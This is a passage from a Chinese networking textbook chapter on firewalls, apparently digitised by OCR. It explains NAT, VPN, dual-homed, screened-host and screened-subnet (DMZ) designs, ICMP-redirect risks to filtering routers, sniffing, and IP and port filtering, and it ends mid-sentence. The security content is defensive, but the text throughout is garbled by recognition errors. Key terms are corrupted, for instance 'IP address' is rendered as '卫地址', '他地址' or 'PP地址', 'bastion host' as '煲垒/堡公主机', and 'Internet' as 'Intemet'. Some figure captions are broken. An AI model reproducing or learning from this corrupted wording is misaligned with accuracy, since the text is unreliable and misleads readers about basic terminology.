引 转 换 有 两 个 好 处 : 其 一 是 隐藏 内 部 网 络 真正 的 卫 地 址 ， 这 可 以 使 黑客 


(Hacker) 无 法 直接 攻击 内 部 网 络 , 这 也 是 要 强调 防火 墙 自身 安全 性 问题 的 主要 原因 ; 另 一 个 
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好 处 是 可 以 让 内 部 使 用 保留 的 他 地址， 这 对 许多 下 地 址 不 足 的 企业 是 有 益 的 。 

(2) 双重 DNS。 

当 内 部 网 络 使 用 没有 注册 的 他 地址 ， 或 是 防火 墙 进行 PP 地 址 转换 时 , DNS 也 必须 经 
过 转换 ， 因 为 ， 同 样 的 一 个 主机 在 内 部 的 P 地 址 与 给 予 外 界 的 IP 地 址 将 会 不 同 ， 有 的 防 
火 墙 会 提供 双重 DNS， 有 的 则 必须 在 不 同 主机 上 各 安装 一 个 DNS。 

(3) 虚拟 企业 网 络 (VPN)。 

VPN 可 以 在 防火 墙 与 防火 墙 或 移动 的 Client 间 对 所 有 网 络 传输 的 内 容 加 密 ， 建 立 一 个 
虚拟 通道 ， 让 两 者 间 感 觉 是 在 同一 个 网 络 上 ， 可 以 安全 且 不 受 拘束 地 互相 存 取 。 这 对 总 公 
司 与 分 公司 之 间或 公司 与 外 出 的 员工 之 间 ， 需 要 直接 联系 ， 又 不 愿 花费 大 量 金钱 另外 申请 
专线 或 用 长 途 电话 拨号 连接 时 ， 将 会 非常 有 用 。 

(4) 扫 毒 功能 。 

大 部 分 防火 墙 都 可 以 与 防 病毒 防火 墙 搭配 实现 扫 毒 功能 ， 有 的 防火 墙 则 可 以 直接 集成 
扫 毒 功能 ， 差 别 只 是 扫 毒 工作 是 由 防火 墙 完成 ， 或 是 由 另 一 台 专 用 的 计算 机 完成 。 

(5) 特殊 控制 需求 。 

有 时 候 企 业 会 有 特别 的 控制 需求 ， 如 限制 特定 使 用 者 才能 发 送 E-mail， 限 制 同 时 上 网 
人 数 ， 限 制 使 用 时 间或 Block Java、ActiveX 等 ， 依 需求 不 同 而 定 。 

3. 提示 

防火 墙 是 企业 网 络 安全 问题 的 流行 方案 ， 即 把 公共 数据 和 服务 置 于 防火 墙 外 ， 使 其 对 
防火 墙 内 部 资源 的 访问 受到 限制 。 而 一 个 好 的 防火 墙 不 但 应 该 具备 包括 检查 、 认 证 、 警 告 、 
记录 的 功能 ， 并 且 能 够 为 使 用 者 可 能 遇 到 的 困境 ， 事 先 提出 解决 方案 ， 如 下 地 址 不 足 形成 
的 他 地 址 转换 的 问题 ,信息 加 密 / 解 密 的 问题 ， 大 企业 要 求 能 够 透 过 Intemet 集中 管理 的 问 
题 等 ， 是 选择 防火 墙 时 必须 考虑 的 重点 。 


7.3 防火墙 的 体系 结构 


鉴于 网 络 结构 的 多 样 性 ， 不 同 站 点 的 安全 要 求 也 不 尽 相 同 ， 所 以 目前 防火 墙 设计 标准 
还 无 法 统一 。 在 应 用 过 程 中 应 根据 实际 情况 来 完成 对 防火 墙 的 体系 结构 的 设计 。 下 面 介绍 
几 种 常见 的 防火 墙 体系 结构 。 


7.3.1 双 宿 /多 宿主 机 模式 


双 宿 /多 宿主 机 防火 墙 是 一 种 拥有 两 个 或 多 个 连接 到 不 同 网 络 的 网 络 接口 的 防火 墙 ， 通 
常 是 一 台 装 有 两 块 或 多 块 网 卡 的 堡 公主 机 ， 两 块 或 多 块 网 卡 各 自 与 受 保护 网 络 和 外 部 网 络 
相连 。 由 于 堡垒 主机 具有 两 个 以 上 的 网 卡 ， 可 以 连接 两 个 以 上 的 网 络 ， 所 以 计算 机 系统 可 
以 充当 这 些 网 络 之 间 的 防火 墙 , 从 一 个 网 络 到 另 一 个 网 络 发 送 的 卫 数据 包 必须 经 过 双 宿 主 
机 的 检查 。 双 宿主 机 检查 通过 的 数据 包 ， 会 根据 安全 策略 进行 处 理 。 

双 宿 /多 宿主 机 模式 下， 堡垒 主机 可 以 采用 包 过 滤 技 术 ， 也 可 以 采用 代理 服务 技术 。 在 
使 用 代理 服务 技术 的 双 宿主 机 中 ， 主 机 的 路 内 功能 通常 是 被 禁止 的 ， 两 个 网 络 之 间 的 通信 
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通过 应 用 层 代 理 服 务 来 完成 。 如 果 一 旦 黑客 侵入 堡垒 主机 并 使 其 具有 路 由 功能 ， 防 火 墙 将 
失去 作用 。 

多 宿主 机 (Multihomed Hosb 拥 有 多 个 网 络 接口 ， 每 一 个 接口 都 连 在 物理 上 和 逻辑 上 不 
分 离 的 不 同 的 网 段 上 。 国 内 已 经 有 防火 墙 可 以 支持 多 达 八 个 网 络 接口 。 每 个 不 同 的 网 络 接 
口 分 别 连接 不 同 的 子 网 ， 不 同 子 网 之 间 的 相互 访问 实施 不 同 访问 控制 策略 。 

下 面 主要 介绍 双 宿主 机 防火 墙 。 一 个 双 宿 主机 是 一 种 防火 墙 ， 拥 有 两 个 连接 到 不 同 网 
络 上 的 网 络 接口 。 例 如 ， 一 个 网 络 接口 连 到 外 部 的 不 可 信任 的 网 络 上 ， 另 一 个 网 络 接口 连 
接 到 内 部 的 可 信任 的 网 络 上 。 这 种 防火 墙 的 最 大 特点 是 人 P 层 的 通信 是 被 阻止 的 ， 两 个 网 络 
之 间 的 通信 可 通过 应 用 层 数 据 共享 或 应 用 层 代 理 服务 来 完成 。 一 般 情况 下 ， 人 们 采用 代理 
服务 的 方法 ， 因 为 这 种 方法 为 用 户 提 供 了 更 为 方便 的 访问 手段 。 

如 图 7-1 所 示 是 通过 应 用 层 数据 共享 来 实现 对 外 网 的 访问 的 示意 图 。 
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7-1 应 用 层 数据 共享 
双 宿 主机 防火 墙 的 另 一 种 方式 是 接受 用 户 的 登录 ， 然 后 再 去 访问 其 他 主机 。 这 种 方式 
要 求 在 双 宿主 机 上 开通 一 些 用 户 账号 ， 这 样 会 非常 危险 。 因 为 用 户 账号 相对 来 说 容易 被 破 
解 ， 同 时 也 提供 了 一 条 黑客 入 侵 的 通道 。 
双 宿 主机 防火 墙 还 可 以 通过 提供 代理 服务 来 实现 ， 代 理 服务 相对 来 说 比较 安全 。 在 双 
宿主 机 上 ， 运 行 各 种 各 样 的 代理 服务 器 ， 当 要 访问 外 部 站 点 时 ， 必 须 先 经 过 代理 服务 器 认 
证 ， 然 后 才 可 以 通过 代理 服务 器 访问 Intemet。 代 理 服 务 模式 如 图 7-2 所 示 。 
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7-2 ”运行 代理 服务 器 的 双 宿 主机 
使 用 双 宿 主机 作为 防火 墙 ， 防 火 墙 本 身 的 安全 性 至 关 重要 。 现 在 出 现 的 新 型 双 宿主 机 
防火 墙 没 有 下 地 址 ， 被 称 为 透明 防火 墙 。 透 明 防 火 墙 自身 的 安全 性 就 比较 高 ， 因 为 在 没有 
全 地 址 的 情况 下 ， 黑 客 则 很 难 对 防火 墙 进 行 攻击 。 
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对 于 非 透明 防火 墙 ， 其 自身 的 安全 性 应 注意 以 下 几 个 方面 。 
首先 ， 要 禁止 网 络 层 的 路 由 功能 ， 和 否则 数据 包 就 会 绕 过 代理 ， 防 火 墙 也 就 失效 了 ， 如 
图 7-3 所 示 表示 了 双 宿 主机 的 路 由 功能 未 被 禁止 。 
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7-3” 双 宿主 机 的 路 由 功能 未 被 禁止 


其 次 ， 双 宿主 机 应 具有 强大 的 身份 认证 系统 ， 才 可 以 阻挡 来 自 外 部 不 可 信和 网 络 的 非法 
登录 。 对 防火 墙 自 身 的 访问 要 么 通过 控制 台 ， 要 么 通过 远程 访问 。 通 过 控制 台 方式 访问 防 
火 墙 很 难 做 到 友好 的 界面 。 因 此 现在 的 防火 墙 大 多 是 通过 控制 台 设 置 一 些 简单 的 参数 ， 其 
他 安全 设置 主要 是 通过 专用 的 程序 或 通过 Web 方式 来 设置 。 为 了 保证 防火 墙 的 安全 性 . 建 
议 在 双 宿主 机 防火 墙 上 增加 一 个 网 络 接口 , 设置 只 有 通过 第 三 个 网 络 接口 才能 访问 防火 墙 。 

双 宿 主机 防火 墙 还 应 尽量 减少 一 些 不 必要 的 服务 ， 任 何 一 种 服务 都 会 存在 被 入 侵 的 可 
能 。 此 外 还 要 删除 一 些 不 必要 的 协议 ， 最 好 只 保留 TCP/IP 协议 。 


7.3.2 ”屏蔽 主机 模式 


屏蔽 主机 防火 墙 由 包 过 滤 路 由 器 和 保 垒 主机 组 成 。 在 这 种 方式 的 防火 墙 中 ， 堡 公主 机 
安装 在 内 部 网 络 上 ， 通 常 在 路 由 器 上 设立 过 滤 规 则 ， 并 使 这 个 煲 垒 主机 成 为 从 外 部 网 络 唯 
一 可 直接 到 达 的 主机 ， 这 确保 了 内 部 网 络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 屏 蔽 主机 防火 
墙 实现 了 网 络 层 和 应 用 层 的 安全 ， 因 而 比 单独 的 包 过 滤 或 应 用 网 关 代 理 更 安全 。 

这 种 防火 墙 强迫 所 有 的 外 部 主机 与 一 个 堡垒 主机 相连 接 ， 而 不 让 它们 直接 与 内 部 主机 
相连 。 为 了 实现 这 个 目的 ， 专 门 设置 了 一 个 过 滤 路 由 器 ， 通 过 它 ， 把 所 有 外 部 到 内 部 的 连 
接 都 路 由 到 了 堡垒 主机 上 。 图 7-4 就 显示 了 屏蔽 主机 防火 墙 的 结构 。 

在 这 种 体系 结构 中 , 煲 垒 主机 位 于 内 部 网 络 中 屏蔽 路 由 器 连接 Intermet 和 内 部 网 , 它 是 
防火 墙 的 第 一 道 防线 。 屏 蔽 路 由 器 需要 进行 适当 的 配置 ， 使 所 有 的 外 部 连接 被 路 由 到 堡 多 
主机 上 。 并 不 是 所 有 服务 的 入 站 连接 都 会 被 路 由 到 堡垒 主机 上 ， 屏 蔽 路 由 器 可 以 根据 安全 
策略 允许 或 禁止 某 种 服务 的 入 站 连接 (外 部 到 内 部 的 主动 连接 )。 

对 于 出 站 连接 (内 部 网 络 到 外 部 不 可 信 网 络 的 主动 连接 )， 可 以 采用 不 同 的 策略 。 对 于 
一 些 服务 ， 如 Telnet， 可 以 允许 它 直接 通过 屏蔽 路 由 器 连接 到 外 部 网 而 不 通过 煲 又 主机; 
其 他 服务 ， 如 WWW 和 SMTP 等 ， 必 须 经 过 保 垒 主机 才能 连接 到 Intemet， 并 在 堡垒 主机 
上 运行 该 服务 的 代理 服务 器 。 怎 样 安排 这 些 服 务 取决 于 安全 策略 。 
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7-4 屏蔽 主机 体系 结构 


这 个 防火 墙 系统 提供 的 安全 等 级 比 包 过 滤 防 火 墙 系统 要 高 ， 因 为 它 实现 网 络 层 安全 ( 包 
过 滤 ) 和 应 用 层 安 全 (代理 服务 )。 所 以 入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ， 必 须 首 先 渗透 
两 种 不 同 的 安全 系统 。 

即使 入 侵 者 进入 了 内 部 网 络 ， 也 必须 和 堡垒 主机 相 竞 争 ， 而 堡垒 主机 是 一 台 安 全 性 很 
高 的 主机 ， 主 机 上 没有 任何 入 侵 者 可 以 利用 的 工具 ， 不 能 作为 黑客 进一步 入 侵 的 基地 。 代 
又 主机 在 应 用 层 对 客户 的 请 求 做 判断 ， 允 许 或 禁止 某 种 服务 。 如 果 该 请 求 被 允许， 堡垒 主 
机 就 把 数据 包 发 送 到 某 一 内 部 主机 或 屏蔽 路 内 器 上 ， 和 否则 抛弃 数据 包 ， 其 过 程 如 图 7-5 所 
示 。 保 又 主机 上 一 般 安 装 的 是 代理 服务 器 程序 ， 即 外 部 网 访问 内 部 网 的 时 候 ， 首 先 经 过 了 
外 部 路 由 器 的 过 滤 ， 然 后 通过 代理 服务 器 代理 后 才能 进入 内 部 网 。 
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7-5 堡垒 主 机 转发 数据 包 


过 滤 路 由 器 是 否 正 确 配置 是 这 种 防火 墙 安全 与 否 的 关键 ， 过 滤 路 由 器 的 路 由 表 应 当 受 
到 严格 的 保护 ， 和 否则 如 果 路 由 表 遭 到 破坏 ， 则 数据 包 就 不 会 被 路 由 到 堡垒 主机 上 ， 使 堡垒 
主机 被 越过 。 

路 由 表 是 怎么 被 入 侵 者 破坏 的 呢 ? 用 什么 办 法 可 以 阻止 这 种 破坏 活动 呢 ? 在 ICMP 的 消 
息 中 有 一 种 重 定向 消息 ， 这 种 消息 用 来 帮助 主机 建立 一 个 更 好 的 路 由 表 。 一 般 情况 下 ， 这 
种 消息 是 由 路 由 器 发 给 主机 的 ， 其 过 程 如 图 7-6 所 示 。 

(1) 假定 主机 发 送 他 包 到 Rl1， 这 种 路 径 选择 一 般 是 默认 路 径 。 

(2) Rl 收 到 IP 包 ， 寻 找 其 路 由 表 ， 发 现 R2 是 一 条 正确 的 路 径 ， 于 是 把 数据 包 发 往 
R2。 在 这 时 ，R1 会 发 现 数据 包 被 从 与 进入 时 相同 的 网 络 接口 发 送出 去 ， 这 样 R1 就 会 发 现 
数据 包 发 往 R1 不 是 一 个 好 的 路 径 ， 于 是 R1 就 要 向 主机 发 送 一 个 重 定 向 信息 包 。 
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(01) IP 数据 包 


(3) 1CNP 二 


定向 


(2) IP 数 据 包 


图 7-6 重 定向 消息 

(3) Rl 向 主机 发 送 一 个 重 定向 信息 包 ， 告 诉 主机 今后 把 数据 包 直 接 发 往 R2， 而 不 经 
过 :及 

这 样 ， 如 果 过 滤 路 由 器 对 重 定向 消息 做 出 应 答 ， 就 会 受到 入 侵 者 所 发 的 错误 的 ICMP 
消息 包 的 攻击 ， 因 此 ICMP 重 定向 消息 的 应 答 必 须 禁 止 。 那 么 通过 什么 来 确定 过 滤 路 由 器 
的 路 由 表 呢 ?可 以 用 Route 命令 建立 静态 的 路 由 表 ， 以 这 种 方法 建立 的 路 由 表 不 会 被 路 由 协 
议 终止 和 改变 ， 这 就 保护 了 静态 路 由 表 不 受 错误 的 路 由 报告 的 影响 。 同 时 ， 还 需要 禁止 过 
滤 路 由 器 的 路 由 协议 守护 进程 运行 ， 以 保证 路 由 不 会 传播 到 外 部 世界 。 


7.3.3 ”屏蔽 子 网 模式 


屏蔽 子 网 防火 墙 采用 两 个 包 过 滤 路 由 器 和 一 个 保 双 主机， 在 内 、 外 网 络 之 间 建 立 了 一 
个 被 隔离 的 子 网 ， 定 义 为 “ 非 军事 区 ”网 络 ， 有 时 也 称 作 周边 网 。 网 络 管理 员 将 保健 主机 、 
Web 服务 器 、Mail 服务 器 等 公用 服务 器 放 在 非 军事 区 网 络 中 。 内 部 网 络 和 外 部 网 络 均 可 访 
问 屏蔽 子 网 ， 但 禁止 它们 穿 过 屏蔽 子 网 通信 。 在 这 一 配置 中 ， 即 使 堡垒 主机 被 入 侵 者 控制 ， 
内 部 网 络 仍 受 到 内 部 过 滤 路 由 器 的 保护 。 

屏蔽 子 网 (Screened SubNet) 在 本 质 上 和 屏蔽 主机 是 一 样 的 ， 但 是 增加 了 一 层 保护 体 
系 周边 网 络 ,堡垒 主机 位 于 周边 网 络 上 , 周边 网 络 和 内 部 网 络 被 内 部 屏蔽 路 由 器 分 开 ， 
其 结构 示意 图 如 图 7-7 所 示 。 


7-7 ”屏蔽 子 网 体系 结构 
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为 什么 要 加 一 个 周边 网 络 呢 ?这 样 设计 又 有 什么 好 处 呢 ? 在 前 面 提 到 过 当 堡 又 主机 被 
入 侵 者 控制 后 ， 整 个 内 部 网 络 就 处 在 危险 之 中 。 堡 又 主机 是 最 容易 受 侵袭 的 ， 虽 然 堡垒 主 
机 很 坚固 ， 不 易 被 入 侵 者 控制 ， 但 万 一 堡垒 主机 被 控制 ， 如 果 采 用 了 屏蔽 子 网 体系 结构 ， 
入 侵 者 仍然 不 能 直接 侵袭 内 部 网 络 ， 内 部 网 络 仍 受到 内 部 屏蔽 路 由 器 的 保护 ， 就 更 加 安 
- 

1. 周边 网 络 

周边 网 络 也 称 为 “停火 区 ”或 者 “ 非 军 事 区 ”(DMZ)， 周 边 网 络 用 了 两 个 包 过 滤 路 由 
器 和 一 个 堡垒 主机 。 这 是 最 安全 的 防火 墙 系统 ， 因 为 在 定义 了 “停火 区 ”网 络 后 ， 它 支持 
网 络 层 和 应 用 层 安全 功能 。 网 络 管理 员 将 堡垒 主机 、 信 息 服务 器 、Modem 组 以 及 其 他 公用 
服务 器 放 在 DMZ 网 络 中 。DMZ 网 络 很 小 ， 处 于 Intemet 和 内 部 网 络 之 间 ， 在 一 般 情况 下 ， 
对 DMZ 配置 成 使 用 Intemet 和 内 部 网 络 系统 能 够 访问 DMZ 网 络 上 数目 有 限 的 系统 ， 而 通 
过 DMZ 网 络 直 接 进行 信息 传输 是 被 严格 禁止 的 。 

周边 网 络 是 一 个 防护 层 ， 它 就 像 电 视 上 军事 基地 的 层 层 铁 门 一 样 ， 即 使 攻破 了 一 道 铁 
门 ， 还 有 另 一 道 铁 门 。 在 周边 网 络 上 ， 可 以 放置 服务 器 ， 如 WWW 和 FTP 服务 器 ， 以 便于 
公众 的 访问 。 这 些 服 务 器 可 能 会 受到 攻击 ， 因 为 它们 是 牺牲 主机 ， 但 内 部 网 络 还 是 被 保护 
着 的 。 

下 面 来 讲 周边 网 络 的 作用 。 现 在 大 部 分 的 局 域 网 采用 以 太 网 ， 以 太 网 的 特点 就 是 广播 
式 的 ,这 样 一 台 位 于 网 络 上 的 机 器 可 以 监听 网 上 所 有 的 通信 。 实现 这 个 目的 是 极为 简单 的 
一 般 情况 下 ， 网 络 接口 只 接收 发 向 自己 的 数据 包 。 如 果 网 络 接口 被 置 成 混合 模式 ， 则 该 网 
络 接口 可 以 接收 任何 数据 包 ， 其 他 网 络 技术 令 牌 环 网 和 FDDI 网 也 是 如 此 。 试 想 ， 如 果 没 
有 周边 网 络 , 那么 入 侵 者 控制 了 堡垒 主机 后 就 可 以 监听 整个 内 部 网 络 的 对 话 。 当 使 用 Telnet 
和 FTP 时 , 入 侵 者 可 以 很 容易 用 Sniffer 嗅 探 到 使 用 者 的 账号 和 口令 .即使 口令 没有 被 攻破 ， 
探听 者 仍然 可 以 阅读 和 访问 他 人 的 敏感 文件 ， 或 偷 阅 他 人 的 E-mail 邮件 。 

如 果 把 煲 垒 主机 放 在 周边 网 络 上 ， 即 使 入 侵 者 控制 了 堡垒 主机 ， 他 所 能 侦 听 到 的 内 容 
也 是 有 限 的 ， 只 有 Intemet 和 堡垒 主机 、 内 部 主机 和 堡垒 主机 间 的 会 话 ， 内 部 网 络 主机 之 间 
的 通信 仍然 是 安全 的 。 因 为 内 部 网 络 上 的 数据 包 虽 然 在 内 部 网 上 是 广播 式 的 ， 但 内 部 过 滤 
路 由 器 会 阻止 这 些 数据 包 流入 周边 网 络 (当然 ， 发 往 周 边 网 络 和 Intemet 的 数据 包 除 外 ， 在 
这 种 情况 下 ， 内 部 过 滤 路 由 器 会 转发 这 些 数据 包 到 周边 网 络 )。 不 仅 如 此 ， 内 部 过 滤 路 由 器 
还 可 以 阻挡 内 部 网 上 的 广播 信息 ， 这 样 入 侵 者 即使 控制 了 堡垒 主机 也 很 难得 到 关于 内 部 网 
的 信息 。 

2. 堡垒 主机 


在 屏蔽 的 子 网 体系 结构 中 ， 堡 垒 主机 被 放置 在 周边 网 络 上 ， 它 可 以 被 认为 是 应 用 层 网 
关 ， 是 这 种 防御 体系 的 核心 。 在 堡垒 主机 上 ， 可 以 运行 各 种 各 样 的 代理 服务 器 。 

(1) 在 堡垒 主机 上 运行 电子 邮件 代理 服务 器 ， 代 理 服 务 器 把 入 站 的 E-mail 转发 到 内 部 
网 的 邮件 服务 器 上 。 

(2) 在 堡垒 主机 上 运行 WWW 代理 服务 器 ， 内 部 网 络 的 用 户 可 以 通过 堡垒 主机 访问 
Intermmet 上 的 WWW 服务 器 。 

(3) 在 堡垒 主机 上 运行 一 个 伪 DNS 服务 器 ， 回 答 Intemet 上 主机 的 查询 。 
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(4) 在 堡垒 主机 上 运行 FTP 代理 服务 器 , 对 外 部 的 FTP 连接 进行 认证 ， 并 转 接 到 内 部 
的 FTP 服务 器 上 。 

对 于 出 站 服务 ， 不 一 定 要 求 所 有 的 服务 都 经 过 堡垒 主机 代理 ， 一 些 服务 可 以 通过 内 部 
过 滤 路 由 器 和 Intemet 直接 对 话 ， 但 对 于 入 站 服务 ， 应 要 求 所 有 的 服务 都 通过 堡垒 主机 。 

3. 内 部 路 由 器 


内 部 路 由 器 (又 称 阻塞 路 由 器 ) 位 于 内 部 网 和 周边 网 络 之 间 ， 用 于 保护 内 部 网 不 受 周 边 
网 络 和 Internet 的 侵害 ， 它 执行 了 大 部 分 的 过 滤 工 作 。 

对 于 一 些 服务 ， 如 出 站 的 Telnet， 可 以 允许 它 不 经 过 堡垒 主 机 而 只 经 过 内 部 过 滤 路 由 
器 。 在 这 种 情况 下 ， 内 部 过 滤 路 由 器 用 来 过 滤 数 据 包 。 内 部 过 滤 路 由 器 也 用 来 过 滤 内 部 网 
络 和 堡垒 主机 之 间 的 数据 包 ， 这 样 做 是 为 了 防止 煲 垒 主机 被 攻占 。 若 不 对 内 部 网 络 和 保 人 又 
主机 之 间 的 数据 包 加 以 控制 ， 当 入 侵 者 控制 了 堡垒 主机 后 ， 就 可 以 不 受 限 制 地 访问 内 部 网 
络 上 的 任何 主机 ， 周 边 网 络 也 就 失去 了 意义 ， 在 实质 上 就 与 屏蔽 主机 结构 一 样 了 。 

在 实际 操作 中 ， 应 把 堡 又 主机 和 内 部 网 主机 之 间 的 通信 限制 到 实际 所 需要 的 程度 ， 即 
最 小 特权 原则 。 如 把 保 又 主机 和 内 部 网 的 SMTP 通信 限制 在 保 垒 主机 的 SMTP 代理 和 内 部 
出 站 服务 器 之 间 ， 以 防止 入 侵 者 在 控制 堡垒 主机 后 ， 利 用 SMTP 对 内 部 网 络 进行 攻击 ， 入 
侵 者 可 以 用 保 又 主机 上 的 一 个 端口 和 内 部 主机 上 的 一 个 大 于 1023 的 端口 建立 连接 , 伪装 一 
个 出 站 的 SMTP 连接 。 

4. 外 部 路 由 器 

外 部 路 由 器 的 一 个 主要 功能 是 保护 周边 网 络 上 的 主机 ， 但 这 种 保护 不 是 很 必要 的 ， 因 
为 这 主要 是 通过 保 又 主机 来 进行 安全 保护 的 ， 但 多 一 层 保护 也 并 无 害处 。 外 部 路 由 器 还 可 
以 把 入 站 的 数据 包 路 由 到 堡垒 主机 ， 外 部 路 由 器 一 般 与 内 部 路 由 器 应 用 相同 的 规则 。 

外 部 路 由 器 还 可 以 防止 部 分 他 欺骗 , 因为 内 部 路 由 器 分 辨 不 出 一 个 声称 从 周边 网 络 来 
的 数据 包 是 否 真 的 从 周边 网 络 来 ， 而 外 部 路 由 器 则 可 以 很 容易 分 辨 出 真 伪 。 


7.4 防火 墙 的 主要 应 用 


防火 墙 是 目前 网 络 安全 领域 应 用 范围 最 广泛 的 网 络 安全 技术 之 一 。 下 面 介绍 一 下 防火 
墙 的 主要 应 用 方法 。 


7.4.1 防火 墙 的 工作 模式 


防火 墙 就 是 一 种 过 滤 塞 (目前 你 这 么 理解 不 算 错 )， 你 可 以 让 你 喜欢 的 东西 通过 这 个 塞 
子 ， 别 的 东西 都 统统 过 滤 掉 。 在 网 络 的 世界 里 ， 要 由 防火 墙 过 滤 的 就 是 承载 通信 数据 的 通 
信和 包 。 

所 有 的 防火 墙 至 少 都 会 说 两 个 词 : Yes 或 者 No。 直 接 说 就 是 接受 或 者 拒绝 。 最 简单 的 
防火 墙 是 以 太 网 桥 ， 但 几乎 没有 人 会 认为 这 种 原始 防火 墙 能 管 多 大 用 。 大 多 数 防火 墙 采 用 
的 技术 和 标准 可 谓 五 花 八 门 。 这 些 防 火 墙 的 形式 多 种 多 样 : 有 的 取代 系统 上 已 经 装备 的 
TCP/IP 协议 栈 ; 有 的 在 已 有 的 协议 栈 上 建立 自己 的 软件 模块 有 的 干脆 就 是 独立 的 一 套 操 
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作 系统 。 还 有 一 些 应 用 型 的 防火 墙 只 对 特定 类 型 的 网 络 连接 提供 保护 (比如 SMTP 或 
者 HTTP 协议 等 ) 。 还 有 一 些 基 于 硬件 的 防火 墙 产 品 ， 其 实 应 该 归 入 安全 路 由 器 一 类 。 
以 上 的 产品 都 可 以 叫做 防火 墙 ， 因 为 它们 的 工作 方式 都 是 一 样 的 : 分 析出 入 防火 墙 
的 数据 包 ， 决 定 放行 还 是 把 它们 扔 到 一 边 。 

所 有 的 防火 墙 都 具有 卫 地 址 过 滤 功 能 。 这 项 任务 要 检查 人 P 包头 ， 根 据 其 人 P 源 地 址 和 
目标 地 址 做 出 放行 /丢弃 决定 。 如 图 7-8 所 示 ， 两 个 网 段 之 间隔 了 一 个 防火 墙 ， 防 火 墙 的 一 
端 有 台 UNIX 计算 机 ， 另 一 边 的 网 段 则 摆 了 人 台 PC 客户 机 ， 这 就 是 防火 墙 的 卫 地 址 过 滤 工 
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图 7-8 IP 地 址 过 滤 原 理 图 


当 PC 客户 机 向 UNIX 计算 机 发 起 telnet 请 求 时 ,PC 的 telnet 客户 程序 就 产生 一 个 TCP 
包 , 并 把 它 传 给 本 地 的 协议 栈 准备 发 送 。 接 下 来 , 协议 栈 将 这 个 TCP 包 “ 寨 "到 一 个 他 包 里 ， 
然后 通过 PC 的 TCP/IP 栈 所 定义 的 路 径 将 它 发 送 给 UNIX 计算 机 。 在 这 个 例子 里 ， 这 个 卫 
包 必 须 经 过 横 在 PC 和 UNIX 计算 机 中 的 防火 墙 才能 到 达 UNIX 计算 机 ， 如 图 7-9 所 示 。 
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图 7-9 TCP/IP 数据 包 发 送 过 程 


现在 我 们 “命令 ”( 用 专业 术语 来 说 就 是 配制 ) 防 火 墙 把 所 有 发 给 UNIX 计算 机 的 数据 
包 都 给 拒 了 ， 完 成 这 项 工作 以 后 ，“ 心 肠 ” 比 较 好 的 防火 墙 还 会 通知 客户 程序 一 声 呢 ! 既 
然 发 向 目标 的 下 数据 没 法 转发 ， 那 么 只 有 和 UNIX 计算 机 同 在 一 个 网 段 的 用 户 才能 访问 
UNIX 计算 机 。 

还 有 一 种 情况 ， 你 可 以 命令 防火 墙 专 给 那 台 可 怜 的 PC 找茬 ， 别 人 的 数据 包 都 让 过 ， 
唯 独 它 不 行 ， 这 正 是 防火 墙 最 基本 的 功能 : 根据 人 P 地 址 做 转发 判断 。 但 要 上 了 大 场面 ， 这 
种 小 伎俩 就 玩 不 转 了 ， 由 于 黑客 们 可 以 采用 人 P 地 址 欺骗 技术 , 伪装 成 合法 地 址 的 计算 机 就 


® 
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可 以 穿越 信任 这 个 地 址 的 防火 墙 了 。 不 过 根据 地 址 的 转发 决策 机 制 还 是 最 基本 和 必需 的 。 
另外 要 注意 的 一 点 是 , 不 要 用 DNS 主机 名 建立 过 滤 表 ， 因 为 对 DNS 的 伪造 比 IP 地 址 欺骗 
要 容易 得 多 。 

服务 器 TCP/UDP 端口 过 滤 如 图 7-10 所 示 。 
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7-10 ”服务 器 TCP/UDP 端口 过 滤 

仅仅 依靠 地 址 进行 数据 过 滤 在 实际 运用 中 是 不 可 行 的 ， 还 有 个 原因 就 是 目标 主机 上 往 
往 运行 着 多 种 通信 服务 。 比 方 说， 我 们 不 想 让 用 户 采 用 telnet 的 方式 连 到 系统 ， 但 这 绝 不 
等 于 我 们 非得 同时 禁止 他 们 使 用 SMTP/POP 邮件 服务 器 吧 ? 所 以 说 ， 在 地 址 之 外 我 们 还 要 
对 服务 器 的 TCP/ UDP 端口 进行 过 滤 。 

例如 ， 默 认 的 telnet 服务 连接 端口 号 是 23。 假 如 我 们 不 许 PC 客户 机 建立 对 UNIX 计 
算 机 (在 这 时 我 们 当 它 是 服务 器 ) 的 telnet 连接 ， 那 么 只 需 命令 防火 墙 检查 发 送 目 标 是 UNIX 
服务 器 的 数据 包 ， 把 其 中 具有 23 目标 端口 号 的 包 过 滤 就 行 了 。 这 样 ， 把 人 P 地 址 和 目标 服 
务 器 TCP/UDP 端口 结合 起 来 ， 不 就 可 以 作为 过 滤 标 准 来 实现 相当 可 靠 的 防火 墙 了 吗 ? 不 ， 
没 这 么 简单 。 

客户 机 也 有 TCP/UDP 端口 过 滤 ， 如 图 7-11 所 示 。 
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7-11 客户 机 TCP/UDP 端口 过 滤 


TCP/IP 是 一 种 端 对 端 协议 ， 每 个 网 络 结 点 都 具有 唯一 的 地 址 。 网 络 结 点 的 应 用 层 也 是 
这 样 ， 处 于 应 用 层 的 每 个 应 用 程序 和 服务 都 具有 自己 的 对 应 “地 址 ”， 也 就 是 端口 号 。 地 
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址 和 端口 都 具备 了 才能 建立 客户 机 和 服务 器 的 各 种 应 用 之 间 的 有 效 通信 联系 。 比 如 ，telnet 
服务 器 在 端口 23 侦 听 入 站 连接 。 同 时 telnet 客户 机 也 有 一 个 端口 号 ， 和 否则 客户 机 的 IP 栈 
怎么 知道 某 个 数据 包 是 属于 哪个 应 用 程序 的 呢 ? 

由 于 历史 的 原因 ， 几 乎 所 有 的 TCP/IP 客户 程序 都 使 用 大 于 1023 的 随机 分 配 端口 号 。 
只 有 UNIX 计算 机 上 的 root 用 户 才 可 以 访问 1024 以 下 的 端口 ,而 这 些 端口 还 保留 为 服务 器 
上 的 服务 所 用 。 所 以 ， 除 非 我 们 让 所 有 具有 大 于 1023 端口 号 的 数据 包 进入 网 络 ， 否 则 各 种 
网 络 连接 都 没 法 正常 工作 。 

这 对 防火 墙 而 言 可 就 麻烦 了 ， 如 果 阻 塞 入 站 的 全 部 端口 ， 那 么 所 有 的 客户 机 都 没 法 使 
用 网 络 资源 。 因 为 服务 器 发 出 响应 外 部 连接 请 求 的 入 站 (就 是 进入 防火 墙 的 意思 ) 数 据 包 也 
没 法 经 过 防火 墙 的 入 站 过 滤 。 反 过 来 ， 打 开 所 有 高 于 1023 的 端口 就 可 行 了 吗 ? 也 不 尽 然 。 
于 很 多 服务 使 用 的 端口 都 大 于 1023， 比 如 X client、 基 于 RPC 的 NFS 服务 以 及 为 数 众多 
